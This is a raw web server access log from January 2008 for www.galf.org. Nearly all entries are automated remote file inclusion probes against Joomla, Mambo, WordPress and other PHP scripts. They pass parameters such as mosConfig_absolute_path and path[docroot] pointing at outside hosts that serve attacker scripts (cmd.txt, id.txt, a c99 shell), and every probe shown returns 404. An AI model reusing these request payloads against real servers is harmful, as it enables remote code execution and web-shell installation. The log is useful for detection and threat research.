62.193.245.38 - - [06/Jan/2008:16:17:04 -0800] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:17:25 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:17:25 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:17:25 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:17:25 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.155.30 - - [06/Jan/2008:16:17:43 -0800] "GET /logs/access_071029.log//modules/xfsection/modify.php?dir_module=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:18:42 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.90.114.126 - - [06/Jan/2008:16:18:42 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:18:44 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.octium.ru//language/lang_german/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:18:44 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:19:15 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:19:18 -0800] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:19:18 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:19:18 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.173 - - [06/Jan/2008:16:19:31 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 3145728 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:19:43 -0800] "GET /logs/display.php?pag=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:19:43 -0800] "GET /logs/display.php?pag=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:19:43 -0800] "GET /display.php?pag=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.16.236.69 - - [06/Jan/2008:16:19:44 -0800] "GET /display.php?pag=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.21.152.2 - - [06/Jan/2008:16:20:13 -0800] "GET /logs/access_071210.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
211.230.148.86 - - [06/Jan/2008:16:20:34 -0800] "GET /logs/access_070917.log/index.php?content=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:16:20:34 -0800] "GET /index.php?content=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.230.148.86 - - [06/Jan/2008:16:20:35 -0800] "GET /logs/index.php?content=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:20:37 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:20:37 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:20:37 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:20:37 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:20:52 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.octium.ru//language/lang_german/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:20:52 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.octium.ru//language/lang_german/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:22:15 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.odady.com/images/tOtti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:22:21 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:22:43 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.octium.ru//language/lang_german/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.94.24.226 - - [06/Jan/2008:16:22:43 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.martina-brodska.com/administrator/components/com_slideshow1/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:22:43 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:22:43 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.octium.ru//language/lang_german/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.99.250 - - [06/Jan/2008:16:22:43 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.106.191 - - [06/Jan/2008:16:23:11 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
87.118.106.191 - - [06/Jan/2008:16:23:11 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:25:48 -0800] "GET //include.php?path[docroot]=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.6.22.173 - - [06/Jan/2008:16:26:03 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 9043968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:27:22 -0800] "GET /inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:27:22 -0800] "GET /inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.60.121.56 - - [06/Jan/2008:16:27:27 -0800] "GET //calendar/include.php?path[docroot]=http://lindapoker.com/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:16:27:27 -0800] "GET //calendar/include.php?path[docroot]=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:16:27:27 -0800] "GET //calendar/include.php?path[docroot]=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:16:27:28 -0800] "GET //calendar/include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:16:27:28 -0800] "GET //calendar/include.php?path[docroot]=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:16:27:28 -0800] "GET //calendar/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:16:27:28 -0800] "GET //calendar/include.php?path[docroot]=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.60.121.56 - - [06/Jan/2008:16:27:28 -0800] "GET //calendar/include.php?path[docroot]=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:27:32 -0800] "GET /logs/access_070723.log/index2.php?url_page=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.83.90 - - [06/Jan/2008:16:27:33 -0800] "GET /index2.php?url_page=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.83.90 - - [06/Jan/2008:16:27:33 -0800] "GET /logs/index2.php?url_page=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.83.90 - - [06/Jan/2008:16:27:33 -0800] "GET /logs/access_070827.log/index2.php?url_page=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.83.90 - - [06/Jan/2008:16:27:41 -0800] "GET /logs/index2.php?url_page=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.200.83.90 - - [06/Jan/2008:16:27:41 -0800] "GET /index2.php?url_page=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.94.98 - - [06/Jan/2008:16:27:46 -0800] "GET /logs/access_070806.log/ndex2.php?url_page=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:27:46 -0800] "GET /ndex2.php?url_page=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.84.94.98 - - [06/Jan/2008:16:27:46 -0800] "GET /logs/ndex2.php?url_page=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:27:47 -0800] "GET /logs/access_070723.log/ndex2.php?url_page=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
201.28.106.195 - - [06/Jan/2008:16:27:56 -0800] "GET /index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.28.106.195 - - [06/Jan/2008:16:28:02 -0800] "GET /index.php?u=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:28:02 -0800] "GET /logs/ndex2.php?url_page=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:16:28:02 -0800] "GET /ndex2.php?url_page=http://mpva.com.au/_baks/.../xpl? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.34.231 - - [06/Jan/2008:16:28:21 -0800] "GET /logs/index2.php?url_page=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.135.34.231 - - [06/Jan/2008:16:28:21 -0800] "GET /index2.php?url_page=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.120.255.114 - - [06/Jan/2008:16:29:45 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://teamuw.com/.xpl/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.120.255.114 - - [06/Jan/2008:16:29:46 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://teamuw.com/.xpl/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.135.34.231 - - [06/Jan/2008:16:30:10 -0800] "GET /index2.php?url_page=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
66.135.34.231 - - [06/Jan/2008:16:30:10 -0800] "GET /logs/index2.php?url_page=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:16:30:51 -0800] "GET /logs/index2.php?url_page=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:16:30:51 -0800] "GET /index2.php?url_page=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:31:01 -0800] "GET /logs/access_071015.log//include.php?path[docroot]=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:31:01 -0800] "GET //include.php?path[docroot]=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.21.152.2 - - [06/Jan/2008:16:31:01 -0800] "GET /logs//include.php?path[docroot]=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:16:31:29 -0800] "GET /logs/access_070723.log/index2.php?url_page=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.149.244.41 - - [06/Jan/2008:16:31:29 -0800] "GET /logs/access_070827.log/index2.php?url_page=http://h1.ripway.com/mlengse/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.15.104.155 - - [06/Jan/2008:16:31:41 -0800] "GET /logs/ndex2.php?url_page=http://www.euphoria.gr/forum/cache/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.15.104.155 - - [06/Jan/2008:16:31:41 -0800] "GET /ndex2.php?url_page=http://www.euphoria.gr/forum/cache/ash.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.152 - - [06/Jan/2008:16:32:21 -0800] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.231.1.130 - - [06/Jan/2008:16:32:29 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
80.231.1.130 - - [06/Jan/2008:16:32:30 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:32:31 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:32:42 -0800] "GET /logs/access_071210.log/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:32:43 -0800] "GET /index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.231.1.130 - - [06/Jan/2008:16:32:43 -0800] "GET /logs/index.php?doc=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.222.110.249 - - [06/Jan/2008:16:33:12 -0800] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [06/Jan/2008:16:33:12 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.222.110.249 - - [06/Jan/2008:16:34:06 -0800] "GET /logs/access_070806.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.1.54 - - [06/Jan/2008:16:34:14 -0800] "GET /logs/access_071008.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.1.54 - - [06/Jan/2008:16:34:14 -0800] "GET /index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
91.121.1.54 - - [06/Jan/2008:16:34:15 -0800] "GET /logs/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:34:30 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:16:34:30 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [06/Jan/2008:16:34:43 -0800] "GET /logs/access_070924.log//include.php?path[docroot]=http://www.icbrasil.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.34.231 - - [06/Jan/2008:16:35:11 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
66.135.34.231 - - [06/Jan/2008:16:35:11 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
72.30.216.8 - - [06/Jan/2008:16:35:38 -0800] "GET /logs/access.log HTTP/1.0" 200 45681 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:36:21 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:36:21 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:36:21 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:16:36:21 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:36:34 -0800] "GET /logs/access_071210.log/main.php?x=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:36:34 -0800] "GET /main.php?x=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:36:34 -0800] "GET /logs/main.php?x=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:36:52 -0800] "GET /logs/access.log/homepage.php?sel=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:36:52 -0800] "GET /homepage.php?sel=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.44.69.194 - - [06/Jan/2008:16:36:52 -0800] "GET /logs/homepage.php?sel=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.44.69.194 - - [06/Jan/2008:16:38:07 -0800] "GET /logs/access_071217.log/main.php?x=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:39:08 -0800] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:39:09 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [06/Jan/2008:16:39:09 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:39:18 -0800] "GET /logs/access_071210.log/inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:39:19 -0800] "GET /inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:39:19 -0800] "GET /logs/inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.17.165.30 - - [06/Jan/2008:16:39:46 -0800] "GET /logs/access_071210.log/inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:39:46 -0800] "GET /inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.17.165.30 - - [06/Jan/2008:16:39:47 -0800] "GET /logs/inc/common.load.php?env[include_prefix]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
